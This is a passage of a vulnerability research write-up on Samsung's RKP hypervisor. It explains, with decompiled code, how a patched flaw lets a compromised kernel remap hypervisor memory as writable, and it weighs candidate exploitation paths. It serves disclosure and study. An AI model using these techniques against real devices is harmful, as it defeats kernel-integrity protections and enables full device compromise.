Attacking Samsung RKP
Disclaimer

This work was done while we were working at Longterm Security and they have kindly allowed us to release the article on our company's blog.

This is a follow-up to our compendium blog post that presented the internals of Samsung's security hypervisor, including all the nitty-gritty details. This extensive knowledge is put to use in today's blog post that explains how we attacked Samsung RKP. After revealing three vulnerabilities leading to the compromise of the hypervisor or of its assurances, we also describe the exploitation paths we came up with. Finally, we take a look at the patches made by Samsung following our report.

In January 2021, we reported three vulnerabilities in Samsung's security hypervisor implementation. Each of the vulnerabilities has a different impact, from writing to hypervisor-enforced read-only memory to compromising the hypervisor itself. The vulnerabilities were fixed in the June 2021 and October 2021 security updates. While they are specific to Samsung RKP, we think that they are good examples of what you should be keeping an eye out for if you're auditing a security hypervisor running on an ARMv8 device.

We will detail each of the vulnerabilities, explain how they can be exploited, and also take a look at their patch. While we recommend reading the original blog post because it will make it easier to understand this one, we tried to summarize all the important bits in the introduction. Feel free to skip the introduction and go directly to the first vulnerability if you are already familiar with Samsung RKP.

Introduction

The main goal of a security hypervisor on a mobile device is to ensure kernel integrity at run time, so that even if an attacker finds a kernel vulnerability, they won't be able to modify sensitive kernel data structures, elevate privileges, or execute malicious code. To do that, the hypervisor executes at a higher privilege level (EL2) than the kernel (EL1), and it can exert complete control over the kernel by making use of the virtualization extensions.

Virtualization Extensions

One of the features of the virtualization extensions is a second layer of address translation. When it is disabled, there is only one layer of address translation, which translates a Virtual Address (VA) directly into a Physical Address (PA). But when it is enabled, the first layer (stage 1 - under control of the kernel) now translates a VA into what is called an Intermediate Physical Address (IPA), and the second layer (stage 2 - under control of the hypervisor) translates this IPA into the real PA. This second layer has its own memory attributes, allowing the hypervisor to enforce memory permissions that differ from the ones in the kernel page tables as well as disable access to some physical memory regions.
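
In practice, this means the effective permissions of a kernel page are the intersection of what the stage 1 and stage 2 tables allow: no matter what the kernel writes into its own page tables, it cannot exceed what the hypervisor grants in the second stage. The toy snippet below, with made-up values, is only meant to illustrate this combination rule.

#include <stdbool.h>
#include <stdio.h>

/* Toy model: a page's effective access rights are the AND of the rights
 * granted by the kernel's stage 1 tables and the hypervisor's stage 2 tables. */
struct perms { bool r, w, x; };

static struct perms combine(struct perms s1, struct perms s2) {
    return (struct perms){ s1.r && s2.r, s1.w && s2.w, s1.x && s2.x };
}

int main(void) {
    struct perms s1 = { true, true, true };   /* kernel maps the page RWX */
    struct perms s2 = { true, false, true };  /* hypervisor allows only RX */
    struct perms eff = combine(s1, s2);
    printf("effective: r=%d w=%d x=%d\n", eff.r, eff.w, eff.x); /* r=1 w=0 x=1 */
    return 0;
}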

Another feature of the virtualization extensions, enabled by the use of the Hypervisor Configuration Register (HCR), allows the hypervisor to handle general exceptions and to trap critical operations usually performed by the kernel (such as accessing system registers). Finally, in the cases where the kernel (EL1) needs to call into the hypervisor (EL2), it can do so by executing an HyperVisor Call (HVC) instruction. This is very similar to the SuperVisor Call (SVC) instruction that is used by userland processes (EL0) to call into the kernel (EL1).
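
For reference, a kernel-side HVC wrapper can be as simple as the sketch below. The register convention shown here (application ID in x0, command ID in x1, arguments in x2/x3, result returned in x0) is an assumption made for illustration; the actual convention used by uH/RKP is implemented by the kernel's uh_call function mentioned later in this post.

#include <stdint.h>

/* Minimal sketch of an EL1 -> EL2 call; must be executed in kernel context.
 * The x0-x3 convention is assumed for illustration and may not match uH/RKP. */
static inline uint64_t hvc_call(uint64_t app_id, uint64_t cmd_id,
                                uint64_t arg0, uint64_t arg1) {
    register uint64_t x0 asm("x0") = app_id;
    register uint64_t x1 asm("x1") = cmd_id;
    register uint64_t x2 asm("x2") = arg0;
    register uint64_t x3 asm("x3") = arg1;
    /* The #0 immediate is encoded in the instruction and readable at EL2 via ESR_EL2. */
    asm volatile("hvc #0"
                 : "+r"(x0), "+r"(x1), "+r"(x2), "+r"(x3)
                 :
                 : "memory");
    return x0;
}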

Samsung RKP Assurances

Samsung's implementation of a security hypervisor enforces that:

  • the page tables cannot be modified directly by the kernel;
    • accesses to virtual memory system registers at EL1 are trapped;
    • page tables are set as read-only in the stage 2 address translation;
      • except for level 3 tables, but in that case the PXNTable bit is set;
  • double mappings are prevented (but the checking is only done by the kernel);
    • still, we can't make the kernel text read-write or a new region executable;
  • sensitive kernel global variables are moved in the .rodata region (read-only);
  • sensitive kernel data structures (cred, task_security_struct, vfsmount) are allocated on read-only pages;
    • on various operations, the credentials of a running task are checked:
      • a task that is not system cannot suddenly become system or root;
      • it is possible to set the cred field of a task_struct in an exploit;
      • but the next operation, like executing a shell, will trigger a violation;
    • credentials are also reference-counted to prevent their reuse by another task;
  • it is not possible to execute a binary as root from outside of specific mount points;
  • on Snapdragon devices, ROPP (ROP prevention) is also enabled by RKP.

Samsung RKP Implementation

Samsung RKP makes extensive use of two data structures: memlists and sparsemaps.

  • A memlist is a list of address ranges (sort of a specialized version of std::vector).
  • A sparsemap associates values with addresses (sort of a specialized version of std::map).
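
As a rough idea of what a memlist looks like, the definitions below are reconstructed solely from the fields visible in the memlist_init, memlist_reserve, and memlist_contains_addr snippets shown later in this post (the sparsemap internals are not detailed here, so only the memlist is sketched). The field names, the order of the fields after base, and the layout of the critical section object are best-effort guesses, not authoritative definitions.

#include <assert.h>
#include <stdint.h>

/* Placeholder for the critical section object used by cs_init/cs_enter/cs_exit;
 * its real size and layout are unknown. */
typedef struct crit_sec {
    uint64_t opaque[4];
} crit_sec_t;

/* Entries are 0x20 bytes each (memlist_reserve allocates 0x20 * size). */
typedef struct memlist_entry {
    uint64_t addr;     /* start address of the region */
    uint64_t size;     /* size of the region */
    uint64_t unkn_10;  /* unknown field */
    uint64_t extra;    /* extra value attached to the region */
} memlist_entry_t;

typedef struct memlist {
    memlist_entry_t* base;  /* backing array of entries */
    uint32_t count;         /* number of entries in use */
    uint32_t capacity;      /* number of entries allocated (5 by default) */
    uint32_t merged;
    uint32_t unkn_14;
    crit_sec_t cs;          /* protects concurrent accesses to the list */
} memlist_t;

static_assert(sizeof(memlist_entry_t) == 0x20, "entries are 0x20 bytes");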

There are multiple instances of these control structures, listed below by order of initialization:

  • the memlist dynamic_regions contains the DRAM regions (sent by S-Boot);
  • the memlist protected_ranges contains critical hypervisor SRAM/DRAM regions;
  • the sparsemap physmap associates a type (kernel text, PT, etc.) to each DRAM page;
  • the sparsemap ro_bitmap indicates if a DRAM page is read-only in the stage 2;
  • the sparsemap dbl_bitmap is used by the kernel to detect double-mapped DRAM pages;
  • the memlist page_allocator.list contains the DRAM region used by RKP's page allocator;
  • the sparsemap page_allocator.map tracks DRAM pages allocated by RKP's page allocator;
  • the memlist executable_regions contains the kernel's executable pages;
  • the memlist dynamic_load_regions is used by the "dynamic load" feature.

Please note that these control structures are used by the hypervisor to keep track of what is in memory and how it is mapped. But they have no direct impact on the actual address translation (unlike the stage 2 page tables). The hypervisor has to carefully keep the control structures and page tables in sync to avoid issues.

The hypervisor has multiple allocators, each serving a different purpose:

  • the "static heap" contains SRAM memory (before initialization) and also DRAM memory (after initialization);
    • It is used for the EL2 page tables, for the memlists and for the page allocator's descriptors;
  • the "dynamic heap" contains only DRAM memory (and the page allocator's memory region is carved out of it);
    • It is used for the EL1 stage 2 page tables and for the sparsemaps (entries and bitmaps);
  • the "page allocator" contains only DRAM memory;
    • It is used for allocating the EL1 stage 1 page tables and for the pages of protected SLUB caches.

Samsung RKP Initialization

The initialization of the hypervisor (alongside the kernel) is detailed in the first blog post. It is crucial when looking for vulnerabilities to know what the state of the various control structures is at a given moment, as well as what the page tables for the stage 2 at EL1 and stage 1 at EL2 contain. The hypervisor state after initialization is reported below.

The control structures are as follows:

  • The protected_ranges contain the hypervisor code/data and the memory backing the physmap.
  • In the physmap,
    • the kernel .text segment is marked as TEXT;
    • user PGDs, PMDs, and PTEs are marked as L1, L2, and L3, respectively;
    • kernel PGDs, PMDs, and PTEs are marked as KERNEL|L1, KERNEL|L2, and KERNEL|L3, respectively.
  • The ro_bitmap contains the kernel .text and .rodata segments, and other pages that have been made read-only in the stage 2 (like the L1, L2, and some of the L3 kernel page tables).
  • The executable_regions contain the kernel .text segment and trampoline page.

In the page tables of the EL2 stage 1 (controlling what the hypervisor can access):

  • the hypervisor segments are mapped (from the initial PTs);
  • the log and "bigdata" regions are mapped as RW;
  • the kernel .text segment is mapped as RO;
  • the first page of swapper_pg_dir is mapped as RW.

In the page tables of the EL1 stage 2 (controlling what the kernel can really access):

  • the hypervisor memory region is unmapped;
  • empty_zero_page is mapped as RWX;
  • the log region is mapped as ROX;
  • the region backing the "dynamic heap" is mapped as ROX;
  • PGDs are mapped as RO:
    • the PXN bit is set on block descriptors;
    • the PXN bit is set on table descriptors, but only for user PGDs.
  • PMDs are mapped as RO:
    • the PXN bit is set for VAs not in the executable_regions.
  • PTEs are mapped as RO for VAs in the executable_regions.
  • the kernel .text segment is mapped as ROX.

Our Research Device

Our test device during this research was a Samsung A51 (SM-A515F). Instead of using a full exploit chain, we have downloaded the kernel source code from Samsung's Open Source website, added a few syscalls, recompiled the kernel, and flashed it onto the device.

The new syscalls make it really convenient to interact with RKP and allow us from userland to:

  • read/write kernel memory;
  • allocate/free kernel memory;
  • make hypervisor calls (using the uh_call function).
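
For example, the syscall used to make hypervisor calls can be a thin wrapper that simply forwards its arguments to uh_call, as in the sketch below. Both the syscall and the uh_call prototype shown here are assumptions made for illustration (the exact uh_call declaration lives in Samsung's kernel sources and varies between versions).

#include <linux/syscalls.h>

/* Hypothetical prototype: the real declaration in Samsung's kernel sources
 * may differ (return type, number of arguments). */
extern unsigned long uh_call(u64 app_id, u64 cmd_id, u64 arg0, u64 arg1, u64 arg2, u64 arg3);

/* Hypothetical helper syscall forwarding user-supplied values to the hypervisor.
 * No sanity checks on purpose: this is a research kernel running on our own device. */
SYSCALL_DEFINE4(rkp_hyp_call, u64, app_id, u64, cmd_id, u64, arg0, u64, arg1)
{
    return uh_call(app_id, cmd_id, arg0, arg1, 0, 0);
}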

Remapping RKP memory as writable from EL1

SVE-2021-20178 (CVE-2021-25415): Possible remapping RKP memory as writable from EL1

Severity: High
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 4, 2021
Disclosure status: Privately disclosed.
Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to remap EL2 memory as writable.
The patch adds the proper address validation in RKP to prevent change of EL2 memory attribution from EL1.

Vulnerability

When Samsung RKP needs to change the permissions of a memory region in the stage 2, it uses either rkp_s2_page_change_permission which operates on a single page, or rkp_s2_range_change_permission which operates on a range of addresses. These functions can be abused to remap hypervisor memory (that was unmapped during initialization) as writable from the kernel, thus fully compromising the security hypervisor. Let's see what happens under the hood when these functions are called.

rkp_s2_page_change_permission starts by performing verifications on its arguments: unless the allow flag is non-zero, the hypervisor must be initialized, the page must not be marked as S2UNMAP in the physmap, it must not come from the hypervisor page allocator, and it cannot be in the kernel .text or .rodata sections. If these verifications succeed, it determines the requested memory attributes and calls map_s2_page to effectively modify the stage 2 page tables. Finally, it flushes the TLBs and updates the writability of the page in the ro_bitmap.

int64_t rkp_s2_page_change_permission(void* p_addr, uint64_t access, uint32_t exec, uint32_t allow) {
  // ...

  // If the allow flag is 0, RKP must be initialized.
  if (!allow && !rkp_inited) {
    uh_log('L', "rkp_paging.c", 574, "s2 page change access not allowed before init %d", allow);
    rkp_policy_violation("s2 page change access not allowed, p_addr : %p", p_addr);
    return -1;
  }
  // The page shouldn't be marked as `S2UNMAP` in the physmap.
  if (is_phys_map_s2unmap(p_addr)) {
    // And trigger a violation.
    rkp_policy_violation("Error page was s2 unmapped before %p", p_addr);
    return -1;
  }
  // The page shouldn't have been allocated by the hypervisor page allocator.
  if (page_allocator_is_allocated(p_addr) == 1) {
    return 0;
  }
  // The page shouldn't be in the kernel text section.
  if (p_addr >= TEXT_PA && p_addr < ETEXT_PA) {
    return 0;
  }
  // The page shouldn't be in the kernel rodata section.
  if (p_addr >= rkp_get_pa(SRODATA) && p_addr < rkp_get_pa(ERODATA)) {
    return 0;
  }
  uh_log('L', "rkp_paging.c", 270, "Page access change out of static RO range %lx %lx %lx", p_addr, access, exec);
  // Calculate the memory attributes to apply to the page.
  if (access == 0x80) {
    ++page_ro;
    attrs = UNKN1 | READ;
  } else {
    ++page_free;
    attrs = UNKN1 | WRITE | READ;
  }
  if (p_addr == ZERO_PG_ADDR || exec) {
    attrs |= EXEC;
  }
  // Call `map_s2_page` to make the actual changes to the stage 2 page tables.
  if (map_s2_page(p_addr, p_addr, 0x1000, attrs) < 0) {
    rkp_policy_violation("map_s2_page failed, p_addr : %p, attrs : %d", p_addr, attrs);
    return -1;
  }
  // Invalidate the TLBs for the target page.
  tlbivaae1is(((p_addr + 0x80000000) | 0xffffffc000000000) >> 12);
  // Call `rkp_set_pgt_bitmap` to update the ro_bitmap.
  return rkp_set_pgt_bitmap(p_addr, access);
}

rkp_s2_range_change_permission operates similarly to rkp_s2_page_change_permission. The first difference lies in the verifications performed by the function. Here the allow flag can take 3 values: 0 (changes are only allowed after initialization), 1 (only allowed before deferred initialization), and 2 (always allowed). The start and end addresses must be page-aligned and in the expected order. No other verifications are performed. The second difference is the function called to perform the changes to the stage 2 page tables, which is s2_map and not map_s2_page.

int64_t rkp_s2_range_change_permission(uint64_t start_addr,
                                       uint64_t end_addr,
                                       uint64_t access,
                                       uint32_t exec,
                                       uint32_t allow) {
  // ...

  uh_log('L', "rkp_paging.c", 195, "RKP_4acbd6db%lxRKP_00950f15%lx", start_addr, end_addr);
  // If the allow flag is 0, RKP must be initialized.
  if (!allow && !rkp_inited) {
    uh_log('L', "rkp_paging.c", 593, "s2 range change access not allowed before init");
    rkp_policy_violation("Range change permission prohibited");
  }
  // If the allow flag is 1, RKP must not be deferred initialized.
  else if (allow != 2 && rkp_deferred_inited) {
    uh_log('L', "rkp_paging.c", 603, "s2 change access not allowed after def-init");
    rkp_policy_violation("Range change permission prohibited");
  }
  // The start and end addresses must be page-aligned.
  if ((start_addr & 0xfff) != 0 || (end_addr & 0xfff) != 0) {
    uh_log('L', "rkp_paging.c", 203, "start or end addr is not aligned, %p - %p", start_addr, end_addr);
    return -1;
  }
  // The start address must be smaller than the end address.
  if (start_addr > end_addr) {
    uh_log('L', "rkp_paging.c", 208, "start addr is bigger than end addr %p, %p", start_addr, end_addr);
    return -1;
  }
  // Calculates the memory attributes to apply to the pages.
  size = end_addr - start_addr;
  if (access == 0x80) {
    attrs = UNKN1 | READ;
  } else {
    attrs = UNKN1 | WRITE | READ;
  }
  if (exec) {
    attrs |= EXEC;
  }
  p_addr_start = start_addr;
  // Call `s2_map` to make the actual changes to the stage 2 page tables.
  if (s2_map(start_addr, end_addr - start_addr, attrs, &p_addr_start) < 0) {
    uh_log('L', "rkp_paging.c", 222, "s2_map returned false, p_addr_start : %p, size : %p", p_start_addr, size);
    return -1;
  }
  // For each page, call `rkp_set_pgt_bitmap` to update the ro_bitmap and invalidate the TLBs.
  for (addr = start_addr; addr < end_addr; addr += 0x1000) {
    res = rkp_set_pgt_bitmap(addr, access);
    if (res < 0) {
      uh_log('L', "rkp_paging.c", 229, "set_pgt_bitmap fail, %p", addr);
      return res;
    }
    tlbivaae1is(((addr + 0x80000000) | 0xffffffc000000000) >> 12);
  }
  return 0;
}

s2_map is a wrapper around map_s2_page that takes into account the various block and page sizes that make up the memory range. map_s2_page does not use any of the control structures. It won't be detailed in this blog post as it is generic code for walking and updating the stage 2 page tables.

int64_t s2_map(uint64_t orig_addr, uint64_t orig_size, attrs_t attrs, uint64_t* paddr) {
  // ...

  if (!paddr) {
    return -1;
  }
  // Floor the address to the page size.
  addr = orig_addr - (orig_addr & 0xfff);
  // And ceil the size to the page size.
  size = (orig_addr & 0xfff) + orig_size;
  // Call `map_s2_page` for each 2 MB block in the region.
  while (size > 0x1fffff && (addr & 0x1fffff) == 0) {
    if (map_s2_page(*paddr, addr, 0x200000, attrs)) {
      uh_log('L', "s2.c", 1132, "unable to map 2mb s2 page: %p", addr);
      return -1;
    }
    size -= 0x200000;
    addr += 0x200000;
    *paddr += 0x200000;
  }
  // Call `map_s2_page` for each 4 KB page in the region.
  while (size > 0xfff && (addr & 0xfff) == 0) {
    if (map_s2_page(*paddr, addr, 0x1000, attrs)) {
      uh_log('L', "s2.c", 1150, "unable to map 4kb s2 page: %p", addr);
      return -1;
    }
    size -= 0x1000;
    addr += 0x1000;
    *paddr += 0x1000;
  }
  return 0;
}

We have seen that the rkp_s2_range_change_permission function performs fewer verifications than rkp_s2_page_change_permission. In particular, it doesn't ensure that the pages of the memory range are not marked as S2UNMAP in the physmap. That means that if we give it a memory range that contains hypervisor memory (unmapped during initialization), it will happily remap it in the second stage.

But it turns out that it is even worse than that: this check doesn't even do anything! One would expect a page to be marked as S2UNMAP in the physmap when it is actually unmapped from stage 2. s2_unmap is the function that does this unmapping. Similarly to s2_map, it is simply a wrapper around unmap_s2_page that takes into account the various block and page sizes that make up the memory range.

int64_t s2_unmap(uint64_t orig_addr, uint64_t orig_size) {
  // ...

  // Floor the address to the page size.
  addr = orig_addr & 0xfffffffffffff000;
  // And ceil the size to the page size.
  size = (orig_addr & 0xfff) + orig_size;
  // Call `unmap_s2_page` for each 1 GB block in the region.
  while (size > 0x3fffffff && (addr & 0x3fffffff) == 0) {
    if (unmap_s2_page(addr, 0x40000000)) {
      uh_log('L', "s2.c", 1175, "unable to unmap 1gb s2 page: %p", addr);
      return -1;
    }
    size -= 0x40000000;
    addr += 0x40000000;
  }
  // Call `unmap_s2_page` for each 2 MB block in the region.
  while (size > 0x1fffff && (addr & 0x1fffff) == 0) {
    if (unmap_s2_page(addr, 0x200000)) {
      uh_log('L', "s2.c", 1183, "unable to unmap 2mb s2 page: %p", addr);
      return -1;
    }
    size -= 0x200000;
    addr += 0x200000;
  }
  // Call `unmap_s2_page` for each 4 KB page in the region.
  while (size > 0xfff && (addr & 0xfff) == 0) {
    if (unmap_s2_page(addr, 0x1000)) {
      uh_log('L', "s2.c", 1191, "unable to unmap 4kb s2 page: %p", addr);
      return -1;
    }
    size -= 0x1000;
    addr += 0x1000;
  }
  return 0;
}

It turns out there are no calls to rkp_phys_map_set, rkp_phys_map_set_region, or even the low-level sparsemap_set_value_addr function that ever mark a page as S2UNMAP. Consequently, we can also use rkp_s2_page_change_permission to remap hypervisor memory in the stage 2!

Exploitation

To exploit this two-fold bug, we need to look for calls to the rkp_s2_page_change_permission and rkp_s2_range_change_permission functions that can be triggered from the kernel (after the hypervisor has been initialized) and with controllable arguments.

Exploring Our Options

rkp_s2_page_change_permission is called:

  • in the rkp_lxpgt_process_table functions;
  • in rkp_set_pages_ro and rkp_ro_free_pages;
  • in set_range_to_pxn_l3 and set_range_to_rox_l3.

And rkp_s2_range_change_permission is called:

  • in many of the dynamic_load_xxx functions.

Let's go over these functions one by one and see if they fit our requirements.

rkp_lxpgt_process_table

In the first blog post, we took a closer look at the functions rkp_l1pgt_process_table, rkp_l2pgt_process_table and rkp_l3pgt_process_table. It is fairly easy to reach the call to rkp_s2_page_change_permission in these functions, assuming that we control the third argument:

  • if is_alloc is equal to 1, the page must not be marked as LX in the physmap,
    • as a result, it will be set as read-only in the stage 2 and marked as LX.
  • if is_alloc is equal to 0, the page must be marked as LX in the physmap,
    • as a result, it will be set as read-write in the stage 2 and marked as FREE.

So by calling one of these functions twice, the first time with is_alloc set to 1, and the second time with is_alloc set to 0, it will result in a call to rkp_s2_page_change_permission with read-write permissions. The next question is: can we call these functions with controlled arguments?

The function processing the level 1 tables, rkp_l1pgt_process_table, is called:

  • in rkp_l1pgt_ttbr;
  • in rkp_l1pgt_new_pgd (seen in the first blog post);
  • in rkp_l1pgt_free_pgd (seen in the first blog post).

The first call is in rkp_l1pgt_ttbr, where the function arguments, ttbr and user_or_kernel, are user-controlled. Because we're attacking Samsung RKP after initialization, rkp_deferred_inited and rkp_inited should be true, and the MMU enabled. Then, if pgd is a user PGD other than empty_zero_page, or a kernel PGD other than swapper_pg_dir and tramp_pg_dir, the rkp_l1pgt_process_table function will be called.

int64_t rkp_l1pgt_ttbr(uint64_t ttbr, uint32_t user_or_kernel) {
  // ...

  // Extract the PGD from the TTBR system register value.
  pgd = ttbr & 0xfffffffff000;
  // Don't do any processing if RKP is not deferred initialized.
  if (!rkp_deferred_inited) {
    should_process = 0;
  } else {
    should_process = 1;
    // For kernel PGDs or user PGDs that aren't `empty_zero_page`.
    if (user_or_kernel == 0x1ffffff || pgd != ZERO_PG_ADDR) {
      // Don't do any processing if RKP is not initialized.
      if (!rkp_inited) {
        should_process = 0;
      }
      // Or if it's the `swapper_pg_dir` kernel PGD.
      if (pgd == INIT_MM_PGD) {
        should_process = 0;
      }
      // Or if it's the `tramp_pg_dir` kernel PGD.
      if (pgd == TRAMP_PGD && TRAMP_PGD) {
        should_process = 0;
      }
    }
    // For the `empty_zero_page` user PGD.
    else {
      // Don't do any processing if the MMU is enabled or RKP is not initialized.
      if ((get_sctlr_el1() & 1) != 0 || !rkp_inited) {
        should_process = 0;
      }
    }
  }
  // If processing of the PGD should be done, call `rkp_l1pgt_process_table`.
  if (should_process && rkp_l1pgt_process_table(pgd, user_or_kernel, 1) < 0) {
    return rkp_policy_violation("Process l1t returned false, l1e addr : %lx", pgd);
  }
  // Then set TTBR0_EL1 for user PGDs, or TTBR1_EL1 for kernel PGDs.
  if (!user_or_kernel) {
    return set_ttbr0_el1(ttbr);
  } else {
    return set_ttbr1_el1(ttbr);
  }
}

However, the function will also set the system register TTBR0_EL1 (for user PGDs) or TTBR1_EL1 (for kernel PGDs), and we don't even have control of the is_alloc argument, so this is not a good path. Let's take a look at our other options.

We have seen the rkp_l1pgt_new_pgd and rkp_l1pgt_free_pgd functions in the first blog post. They could have been very good candidates, but there is one major drawback to using them: the table address given to rkp_l1pgt_process_table comes from rkp_get_pa. This function calls check_kernel_input to ensure the address is not in the protected_ranges memlist, so we can't use addresses located in hypervisor memory.

Instead, what we can do is try to reach the processing of the next level table so that the value given to rkp_l2pgt_process_table comes from a descriptor's output address and not from a call to rkp_get_pa. This way, the table address argument will be fully user-controlled.

The function processing the level 2 tables, rkp_l2pgt_process_table, is called:

  • in rkp_l1pgt_process_table;
  • in rkp_l1pgt_write (seen in the first blog post).

And the function processing the level 3 tables, rkp_l3pgt_process_table, is called:

  • in check_single_l2e (seen in the first blog post, called from rkp_l2pgt_process_table and rkp_l2pgt_write).

The rkp_l1pgt_write and rkp_l2pgt_write functions, which we have also seen in the first blog post, are very good candidates that allow calling rkp_l2pgt_process_table and rkp_l3pgt_process_table by writing in the kernel page tables a fake level 1 or level 2 descriptor, respectively.

For the sake of completeness, we will take a look at our other options even though we have already found an exploitation path for the vulnerability.

set_range_to_xxx_l3

set_range_to_pxn_l3 is called all the way from rkp_set_range_to_pxn. This function calls set_range_to_pxn_l1, passing it the PGD as an argument, as well as the start and end addresses of the range to set as PXN in the stage 1 page tables. It also invalidates the TLBs and the instruction cache for this range.

int64_t rkp_set_range_to_pxn(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  // Call `set_range_to_pxn_l1` to walk the PGD and set PXN bit of the descriptors mapping the address range.
  res = set_range_to_pxn_l1(table, start_addr, end_addr);
  if (res) {
    uh_log('W', "rkp_l1pgt.c", 186, "Fail to change attribute to pxn");
    return res;
  }
  // Invalidate the TLBs for the memory region.
  size = end_addr - start_addr;
  invalidate_s1_el1_tlb_region(start_addr, size);
  // Invalidate the instruction cache for the memory region.
  paddr = rkp_get_pa(start_addr);
  invalidate_instruction_cache_region(paddr, size);
  return 0;
}

set_range_to_pxn_l1 ensures the PGD is marked as KERNEL|L1 in the physmap. It then iterates over the descriptors that map the address range given as an argument and calls set_range_to_pxn_l2 on the table descriptors to process the PMDs.

int64_t set_range_to_pxn_l1(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  // Ensure the PGD is marked as `KERNEL|L1` in the physmap.
  if (is_phys_map_kernel(table) && is_phys_map_l1(table)) {
    res = 0;
    // Iterate over the PGD descriptors that map the address range.
    for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
      // Compute the start and end address of the region mapped by this descriptor.
      next_end_addr = (next_start_addr & 0xffffffffc0000000) + 0x40000000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc = *(table + 8 * ((next_start_addr >> 30) & 0x1ff));
      // If the descriptor is a table descriptor.
      if ((table_desc & 0b11) == 0b11) {
        // Call `set_range_to_pxn_l2` to walk the PMD and set PXN bit of the descriptors mapping the address range.
        res += set_range_to_pxn_l2(table_desc & 0xfffffffff000, next_start_addr, next_end_addr);
      }
    }
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}

set_range_to_pxn_l2 ensures the PMD is marked as KERNEL|L2 in the physmap. It then iterates over the descriptors that map the address range given as an argument and calls set_range_to_pxn_l3 on the table descriptors to process the PTs. In addition, if the descriptors don't map one of the executable regions, it sets their PXN bit.

int64_t set_range_to_pxn_l2(uint64_t table, uint64_t start_addr, int64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  // Ensure the PMD is marked as `KERNEL|L2` in the physmap.
  if (is_phys_map_kernel(table) && is_phys_map_l2(table)) {
    res = 0;
    // Iterate over the PMD descriptors that map the address range.
    for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
      // Compute the start and end address of the region mapped by this descriptor.
      next_end_addr = (next_start_addr & 0xffffffffffe00000) + 0x200000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc_p = table + 8 * ((next_start_addr >> 21) & 0x1ff);
      // Check if the descriptor value is in the executable regions. If it is not, set the PXN bit of the descriptor.
      // However, I believe the mask extracting only the output address of the descriptor is missing...
      if (*table_desc_p && !executable_regions_contains(*table_desc_p)) {
        set_pxn_bit_of_desc(table_desc_p, 2);
      }
      // If the descriptor is a table descriptor.
      if ((*table_desc_p & 0b11) == 0b11) {
        // Call `set_range_to_pxn_l3` to walk the PT and set PXN bit of the descriptors mapping the address range.
        res += set_range_to_pxn_l3(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
      }
    }
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}

set_range_to_pxn_l3 checks if the PT is marked as KERNEL|L3 in the physmap. If it is, the hypervisor stops protecting it by making it writable again in the second stage and marking it as FREE in the physmap. In both cases, it then iterates over the descriptors that map the address range given as an argument and, if they don't map one of the executable regions, sets their PXN bit.

int64_t set_range_to_pxn_l3(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  // Ensure the PT is marked as `KERNEL|L3` in the physmap.
  if (is_phys_map_kernel(table) && is_phys_map_l3(table)) {
    // Call `rkp_s2_page_change_permission` to make it writable in the second stage.
    res = rkp_s2_page_change_permission(table, 0 /* read-write */, 0 /* non-executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 153, "pxn l3t failed, %lx", table);
      rkp_phys_map_unlock(table);
      return res;
    }
    // Mark it as `FREE` in the physmap.
    res = rkp_phys_map_set(table, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(table);
      return res;
    }
  }
  // Iterate over the PT descriptors that map the address range.
  for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
    // Compute the start and end address of the region mapped by this descriptor.
    next_end_addr = (next_start_addr + 0x1000) & 0xfffffffffffff000;
    if (next_end_addr > end_addr) {
      next_end_addr = end_addr;
    }
    table_desc_p = table + 8 * ((next_start_addr >> 12) & 0x1ff);
    // If the descriptor is a page descriptor, and the descriptor value is not in the executable regions, then set its
    // PXN bit. I believe the mask extracting only the output address of the descriptor is missing...
    if ((*table_desc_p & 0b11) == 0b11 && !executable_regions_contains(*table_desc_p, 3)) {
      set_pxn_bit_of_desc(table_desc_p, 3);
    }
  }
  rkp_phys_map_unlock(table);
  return 0;
}

rkp_set_range_to_pxn is always called (from the "dynamic load" feature's functions) on swapper_pg_dir. It will thus walk the kernel page tables and set the PXN bit of the block and page descriptors spanning over the specified address range. The call to rkp_s2_page_change_permission that we are interested in only happens for level 3 tables that are also marked KERNEL|L3 in the physmap.

It is not a good option for us for many reasons: our target page of hypervisor memory would need to be marked KERNEL|L3 in the physmap; it requires that we have already written a user-controlled descriptor into the kernel page tables (bringing us back to the rkp_lxpgt_process_table functions that we have seen above); and finally, the "dynamic load" feature is only available on Exynos devices, as we are going to see with the next vulnerability.

set_range_to_rox_l3 is called all the way from rkp_set_range_to_rox. The rkp_set_range_to_rox and set_range_to_rox_lx functions are very similar to their PXN counterparts. rkp_set_range_to_rox calls set_range_to_rox_l1, passing it the PGD as an argument.

int64_t rkp_set_range_to_rox(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  // Call `set_range_to_rox_l1` to walk the PGD and set the regions of the address range as ROX.
  res = set_range_to_rox_l1(table, start_addr, end_addr);
  if (res) {
    uh_log('W', "rkp_l1pgt.c", 199, "Fail to change attribute to rox");
    return res;
  }
  // Invalidate the TLBs for the memory region.
  size = end_addr - start_addr;
  invalidate_s1_el1_tlb_region(start_addr, size);
  // Invalidate the instruction cache for the memory region.
  paddr = rkp_get_pa(start_addr);
  invalidate_instruction_cache_region(paddr, size);
  return 0;
}

set_range_to_rox_l1 ensures the PGD is swapper_pg_dir and is marked as KERNEL|L1 in the physmap. It then iterates over the descriptors that map the address range given as an argument and changes the memory attributes of these descriptors to make the memory read-only executable. In addition, for table descriptors, it calls set_range_to_rox_l2 to process the PMDs.

int64_t set_range_to_rox_l1(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  if (table != INIT_MM_PGD) {
